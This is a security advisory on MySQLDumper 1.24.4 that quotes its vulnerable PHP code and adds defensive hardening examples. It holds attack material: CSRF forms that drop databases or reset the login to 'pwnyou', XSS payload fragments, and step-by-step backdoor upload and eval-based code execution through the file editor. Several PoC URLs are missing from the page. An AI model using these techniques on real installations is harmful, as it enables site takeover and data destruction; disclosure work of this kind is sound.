MySQLDumper 1.24.4 Multiple Vulns

Vulnerability ID: 1047564    Vulnerability type: (not given)
Published: 2012-04-28    Updated: 2012-04-28
Platform: N/A    CVSS score: N/A
Vulnerable Software: MySQLDumper Version 1.24.4
Downloaded from:
(MD5 SUM: b62357a0d5bbb43779d16427c30966a1 *
About Software:
What is MySQLDumper ?
MySQLDumper is a PHP and Perl based tool for backing up MySQL databases.
You can easily dump your data into a backup file and - if needed - restore it.
It is especially suited for shared hosting webspaces, where you don't have shell access.
MySQLDumper is an open source project and released under the GNU-license.
Safe mode off
OS: Windows XP SP2 (32 bit)
PHP Version:
MYSQL: 5.5.23

Vuln Desc:
MySQLDumper 1.24.4 is prone to:
LFI, XSS, CSRF, PHP code execution, path traversal and information disclosure vulnerabilities.

Local File Inclusion
/* Vulnerable code section (install.php) */

if (!@ob_start("ob_gzhandler")) @ob_start();
// the loop bodies are not shown on the page; their effect, which the advisory goes on
// to exploit, is that request parameters become same-named variables, so $language
// can be set straight from the query string
foreach ($_GET as $getvar=>$getval) { /* body omitted on the page */ }
foreach ($_POST as $postvar=>$postval) { /* body omitted on the page */ }
include_once ( './inc/functions.php' );
include_once ( './inc/mysql.php' );
include_once ( './inc/runtime.php' );
if (!isset($language)) $language="en";

include ( './language/lang_list.php' );
// $language is spliced into the include path without any validation: traversal / LFI
include ( 'language/' . $language . '/lang_install.php' );
include ( 'language/' . $language . '/lang_main.php' );
include ( 'language/' . $language . '/lang_config_overview.php' );


XSS on inputs via $_POST; the snippet below shows the reflected sink in index.php, where $_GET['page'] is echoed unescaped into a frame src attribute:
/* Vulnerable code section (index.php) */
if (!@ob_start("ob_gzhandler")) @ob_start();
include ('./inc/functions.php');
$page=(isset($_GET['page'])) ? $_GET['page'] : 'main.php';
if (!file_exists("./work/config/mysqldumper.php"))
{
	header("location: install.php");
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="Author" content="Daniel Schlichtholz">

<frameset border=0 cols="190,*">
	<frame name="MySQL_Dumper_menu" src="menu.php" scrolling="no" noresize
		frameborder="0" marginwidth="0" marginheight="0">
	<frame name="MySQL_Dumper_content" src="<?php
	echo $page; // <= here: the raw page parameter lands inside the src attribute
	?>"
		scrolling="auto" frameborder="0" marginwidth="0" marginheight="0">
</frameset>
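An added hardening example for the two sinks shown above (install.php splicing $language into an include path, index.php echoing $page into a frame src). This is example code written for this page, not MySQLDumper's own; the locale pattern, the page allowlist and the temporary language directory it creates are assumptions, and it needs PHP 7.1 or later.

```php
<?php
// Added example, not MySQLDumper's code: allowlist the two request parameters
// the advisory shows flowing unvalidated into include() and into a frame src.
// Function names, the page list and the temp directory layout are illustrative.

// install.php: $language is spliced into include('language/'.$language.'/...').
// Accept only a short locale identifier that names an existing sub-directory.
function safe_language(?string $requested, string $langDir): string
{
    if ($requested === null || !preg_match('/^[a-z]{2}(_[A-Z]{2})?$/D', $requested)) {
        return 'en';
    }
    // The existence check runs on the validated name, never on the raw input.
    return is_dir($langDir . '/' . $requested) ? $requested : 'en';
}

// index.php: $page is echoed into <frame src="...">. Only a fixed set of local
// scripts is acceptable; this also blocks javascript: and external URLs.
const ALLOWED_PAGES = ['main.php', 'config_overview.php', 'filemanagement.php', 'sql.php'];

function safe_page(?string $requested): string
{
    return ($requested !== null && in_array($requested, ALLOWED_PAGES, true))
        ? $requested
        : 'main.php';
}

// Escape at the sink regardless: attribute context, quotes included.
function frame_src_attr(string $page): string
{
    return htmlspecialchars($page, ENT_QUOTES | ENT_HTML401, 'UTF-8');
}

// Constructed probes modelled on the advisory's payloads (not real traffic).
$langDir = sys_get_temp_dir() . '/lang_demo_' . getmypid();
mkdir($langDir . '/en', 0700, true);
mkdir($langDir . '/de', 0700, true);

$probes = [
    'de',
    '../../../../etc/passwd%00',     // traversal against $language
    '"><script>alert(1)</script>',    // attribute break-out against $page
    'javascript:alert(1)',            // scheme injection into the frame src
    'sql.php',
];
foreach ($probes as $p) {
    printf("%-32s language=%-4s page=%s\n", $p, safe_language($p, $langDir), frame_src_attr(safe_page($p)));
}

rmdir($langDir . '/en');
rmdir($langDir . '/de');
rmdir($langDir);
```

htmlspecialchars() alone would leave javascript:alert(1) untouched inside the src attribute, which is why the allowlist does the real work and escaping is kept only as a second layer at the sink.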


XSS via $_GET (the PoC URLs are missing from the page; only the trailing parameter fragments survive):
%3C/script%3E&language=en&submit=Installation;%3C/script%3E;%3C/script%3E&tablename=1;%3C/script%3E

CSRF: delete the application's access protection via $_GET
<img src="" />

*After this the application is completely unprotected to the world.*

CSRF: drop a database

<img src="http://localhost/tld/meonyourpc.PNG" height="250" width="300" />
<form name="hackit" id="hackit" action="" method="post">
<p><blink>Hotlink Protection is Active! Please click refresh button.</blink></p>
<input name="kill1" value="Refresh" onclick="alert('Congrats!) Your Database Dropped!')" type="submit">
</form>

kill0 is always information_schema (which obviously cannot be dropped), so increment the index instead:
kill1, kill2, etc.

CSRF: uninstall the application via $_GET
or  (this deletes the existing config.php file)

CSRF: change the password

<body onload="javascript:document.forms[0].submit()">
<form method="post" action="">
<input name="username" id="username" type="text" value="pwnyou" />
<input name="userpass1" id="userpass1" type="text" value="pwnyou" />
<input name="userpass2" id="userpass2" type="text" value="pwnyou" />
<!--SHA1 (all Systems) -->
<input type="radio" name="type" id="type2" value="2" checked="checked" >
</form>
</body>


CSRF: execute SQL commands via $_GET
e.g. to create a denial-of-service condition:
<img src=",md5%28now%28%29%29%29--" height="0" width="0" />
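An added example of the check that every CSRF case above lacks: a per-session token that each state-changing form must carry and that the server verifies before acting. This is illustrative code written for this page, not MySQLDumper's; the session is modelled as a plain array so the script runs from the command line (the real application would use $_SESSION), the field name csrf is an assumption, and it needs PHP 7.1 or later.

```php
<?php
// Added example, not MySQLDumper's code: a per-session anti-CSRF token for the
// state-changing actions the advisory drives by GET or by an auto-submitted form
// (drop database, uninstall, change password, execute SQL). Names are illustrative.

// Token lives in the session; 32 random bytes, so a third-party page cannot guess it.
function csrf_token(array &$session): string
{
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

// The hidden field every state-changing form must carry.
function csrf_field(string $token): string
{
    return '<input type="hidden" name="csrf" value="'
        . htmlspecialchars($token, ENT_QUOTES, 'UTF-8') . '">';
}

// Guard for a handler: state changes only via POST, and the submitted token must
// match the session's; hash_equals() compares in constant time (no timing oracle).
function csrf_ok(string $method, array $post, array $session): bool
{
    if ($method !== 'POST' || empty($session['csrf'])) {
        return false;
    }
    $sent = $post['csrf'] ?? null;
    return is_string($sent) && hash_equals($session['csrf'], $sent);
}

// Constructed requests that mirror the advisory's PoCs (not captured traffic).
$session = [];
$token   = csrf_token($session);
echo csrf_field($token), "\n";

$cases = [
    '<img src="...?kill1=1"> (GET)'    => ['GET',  ['kill1' => '1']],
    'auto-submitted form, no token'    => ['POST', ['kill1' => 'Refresh']],
    'attacker-guessed token'           => ['POST', ['kill1' => 'Refresh', 'csrf' => str_repeat('0', 64)]],
    'legitimate form with csrf_field'  => ['POST', ['kill1' => 'Refresh', 'csrf' => $token]],
];
foreach ($cases as $label => [$method, $post]) {
    printf("%-34s -> %s\n", $label, csrf_ok($method, $post, $session) ? 'allowed' : 'rejected');
}
```

Rejecting GET closes the <img src> variants outright; the token closes the auto-submitted form variants, because a cross-origin page cannot read the victim's session token to put it in the form. On modern browsers a SameSite cookie attribute adds a second, browser-enforced layer on top of this.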

After gaining access to the application (e.g. after successfully exploiting the CSRF that deletes the protection),
a remote attacker can use the following techniques to upload a backdoor,
which completely compromises the site.
*Upload backdoor:*
Rename your backdoor on your PC to me.php.gz.
Then switch to:
Upload it:
Then switch to:
In the input box called File:
enter the relative/absolute path of your uploaded me.php.gz (default ./work/backup/me.php.gz).
Click the RELOAD button.
In the input box called File: change the file extension to:
Click the Save button and voilà, your backdoor is in place.
You can find it:

The same technique can be used without uploading any file:
To do so:
Switch to

Enter a non-existent file name in the input called File:
e.g.:
Click the Reload button.
It will ask *Create it?*
Click the *Create* button.
Paste your backdoor content into the textarea and click the Save button.

The same technique can be used to add a custom .htaccess handler (to execute the backdoor as, e.g., a *.gif file).

*NOTE* The second technique can also be used by an attacker to overwrite existing files or read arbitrary files on the site/server.

There is also a chance to execute our code through PHP's eval language *construct*.
We have PHP code execution here:

Vulnerable code section (the menu frame's script, which switches configuration profiles):
if (isset($_POST['selected_config'])||isset($_GET['config']))
{
	if (isset($_POST['selected_config'])) $new_config=$_POST['selected_config'];
	// Configuration was switched in content frame?
	if (isset($_GET['config'])) $new_config=$_GET['config'];
	// restore the last active menuitem
	if (is_readable($config['paths']['config'].$new_config.'.php'))
	{
		if (read_config($new_config))
		{
			$_SESSION['config_file']=$new_config; //$config['config_file'];
			echo '<script language="JavaScript" type="text/javascript">
			if (parent.MySQL_Dumper_content.location.href.indexOf("config_overview.php")!=-1)
				var selected_div=parent.MySQL_Dumper_content.document.getElementById("sel").value;
			else selected_div=\'\';
			</script>'; // the rest of the emitted script is not shown on the page
		}
	}
	if (isset($_GET['config'])) $config_refresh=''; // prevent a re-call when handed over from the content area
}

As you can see, $new_config is taken straight from $_POST['selected_config'] or $_GET['config'] and concatenated into a path, so it can be traversed with ../ sequences.

If we look at the read_config() function:

function read_config($file=false)
{
	global $config,$databases;
	if (!$file) $file=$config['config_file'];
	// protect from including external files
	$search=array(':', 'http', 'ftp', ' ');
	$replace=array('', '', '', '');
	// $search/$replace are applied to $file with str_replace() (the call is not
	// shown on the page): a blacklist that leaves '../' untouched

	if (is_readable($config['paths']['config'].$file.'.php'))
	{
		// to prevent modern server from caching the new configuration we need to evaluate it this way
		// (the file is read into $f and handed to eval($f) here; that body is not shown on the page)
	}
	return $ret;
}

This means a remote attacker can have their own file evaluated as PHP (note the eval($f)).

Our exploit:
  where ss = ss.php
#cat ss.php # e.g. the attacker's own uploaded file:
echo 'Our command executed ' . getcwd();

Print screen:

There are also a lot of cross-site scripting (XSS) vulnerabilities:
Switch to:

select '<script>alert(1);</script>'

and click Execute SQL Statement.

/* Vulnerable code section (the file-management script) */
if (isset($_GET['action'])&&$_GET['action']=='dl') $download=true;
include ('./inc/header.php');
include_once ('./language/'.$config['language'].'/lang.php');
include_once ('./language/'.$config['language'].'/lang_filemanagement.php');
include_once ('./language/'.$config['language'].'/lang_config_overview.php');
include_once ('./language/'.$config['language'].'/lang_main.php');
include_once ('./inc/functions_files.php');
include_once ('./inc/functions_sql.php');
if ($config['auto_delete']==1) $msg=AutoDelete();
get_sql_encodings(); // get possible sql charsets and also get default charset
//0=database  1=structure
$action=(isset($_GET['action'])) ? $_GET['action'] : 'files';
$kind=(isset($_GET['kind'])) ? $_GET['kind'] : 0;
$expand=(isset($_GET['expand'])) ? $_GET['expand'] : -1;
$selectfile=(isset($_POST['selectfile'])) ? $_POST['selectfile'] : "";
$destfile=(isset($_POST['destfile'])) ? $_POST['destfile'] : "";
$compressed=(isset($_POST['compressed'])) ? $_POST['compressed'] : "";
$dk=(isset($_POST['dumpKommentar'])) ? ((get_magic_quotes_gpc()) ? stripslashes($_POST['dumpKommentar']) : $_POST['dumpKommentar']) : "";
$dk=str_replace(':','|',$dk); // remove : because of statusline
$dump['sel_dump_encoding']=(isset($_POST['sel_dump_encoding'])) ? $_POST['sel_dump_encoding'] : get_index($config['mysql_possible_character_sets'],$config['mysql_standard_character_set']);
$dump['dump_encoding']=isset($config['mysql_possible_character_sets'][$dump['sel_dump_encoding']]) ? $config['mysql_possible_character_sets'][$dump['sel_dump_encoding']] : 0;

if ($action=='dl')
{
	// Download of a backup file wanted
	// (how $file is built from the request, and the fopen() that turns it into a
	// stream before the read loop, are not shown on the page)
	if (is_readable($file))
	{
		header('Content-Description: File Transfer');
		header('Content-Type: application/octet-stream');
		header('Content-Disposition: attachment; filename='.basename($file));
		header('Content-Transfer-Encoding: binary');
		header('Expires: 0');
		header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
		header('Pragma: public');
		header('Content-Length: '.(string) filesize($file));
		while (!feof($file))
		{
			print fread($file,round(100*1024));
		}
	}
}

Since $file is never confined to the backup directory, this can be used by an attacker to download arbitrary files from the site/server.
Print screen:
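The three file-handling flaws above (the editor that turns me.php.gz into a PHP file or creates an .htaccess, read_config() feeding a traversable profile name to eval(), and the download handler calling is_readable($file) on an unconfined path) share one root cause: a request-supplied name reaches the filesystem without being confined to the directory it belongs in. The block below is an added example written for this page, not MySQLDumper's code; it assumes PHP 7.1 or later, a backup directory that holds only .sql/.sql.gz files, and JSON configuration profiles in place of evaluated PHP, all of which are illustrative choices.

```php
<?php
// Added example, not MySQLDumper's code: confine every file name taken from the
// request to the directory it belongs in, restrict backup names to .sql/.sql.gz,
// and load configuration profiles without eval(). The directory layout, file
// names and function names are illustrative assumptions.

// Canonical path of $name inside $baseDir, or null if the file does not exist or
// resolves outside $baseDir (covers ../, absolute paths, NUL bytes and symlinks).
function confine_path(string $baseDir, string $name): ?string
{
    if (strpos($name, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // basename() drops directory components before the path is ever resolved
    $candidate = realpath($base . DIRECTORY_SEPARATOR . basename($name));
    if ($candidate === false) {
        return null;
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($candidate, $prefix, strlen($prefix)) === 0 ? $candidate : null;
}

// Names the download and editor handlers may touch: plain backup files only,
// so me.php.gz, a renamed .php or an .htaccess never get through.
function is_backup_name(string $name): bool
{
    return (bool) preg_match('/^[A-Za-z0-9_-]+(\.[A-Za-z0-9_-]+)*\.sql(\.gz)?$/D', $name);
}

// Config profile: a bare identifier instead of read_config()'s blacklist
// (':', 'http', 'ftp', ' '), which leaves '../' untouched.
function safe_config_name(string $name): ?string
{
    return preg_match('/^[A-Za-z0-9_-]{1,64}$/D', $name) ? $name : null;
}

// Data, not code: a JSON profile is parsed, never passed to eval().
function load_config(string $configDir, string $name): ?array
{
    $safe = safe_config_name($name);
    $path = $safe === null ? null : confine_path($configDir, $safe . '.json');
    if ($path === null) {
        return null;
    }
    $data = json_decode((string) file_get_contents($path), true);
    return is_array($data) ? $data : null;
}

// Demonstration on a constructed layout under the system temp directory.
$root   = sys_get_temp_dir() . '/msd_demo_' . getmypid();
$backup = $root . '/work/backup';
$config = $root . '/work/config';
mkdir($backup, 0700, true);
mkdir($config, 0700, true);
file_put_contents($backup . '/site.sql.gz', 'constructed backup');
file_put_contents($config . '/mysqldumper.json', json_encode(['dbhost' => 'localhost']));
file_put_contents($root . '/secret.txt', 'not for download');

foreach (['site.sql.gz', '../../secret.txt', 'me.php.gz', "site.sql.gz\0.php", '.htaccess'] as $n) {
    $ok = is_backup_name($n) && confine_path($backup, $n) !== null;
    printf("download %-22s -> %s\n", addcslashes($n, "\0"), $ok ? 'allowed' : 'rejected');
}
foreach (['mysqldumper', '../../../ss', 'mysqldumper;x'] as $c) {
    printf("config   %-22s -> %s\n", $c, load_config($config, $c) !== null ? 'loaded' : 'rejected');
}

foreach ([$backup . '/site.sql.gz', $config . '/mysqldumper.json', $root . '/secret.txt'] as $f) {
    unlink($f);
}
foreach ([$backup, $config, $root . '/work', $root] as $d) {
    rmdir($d);
}
```

The name check and the realpath() confinement are deliberately independent: the regex stops the rename-to-.php and .htaccess tricks from the editor, while confine_path() stops the traversal that read_config()'s blacklist and the download handler both miss, including the case where a symlink inside the backup directory points elsewhere.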

Information Disclosure:
Try to access this file directly:
It generates a lot of PHP notices.
It generates a lot of PHP notices and then dies with a fatal error that discloses the filesystem path:
Fatal error: Call to undefined function MSD_mysql_connect() in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\cubemail\inc\functions.php on line 147

NOTE: Previous versions may also be affected, but this was not tested.

================================ EOF ======================================

+++++++Greetz to all++++++++++ and
to all AA Team.
Thank you.

/AkaStep ^_^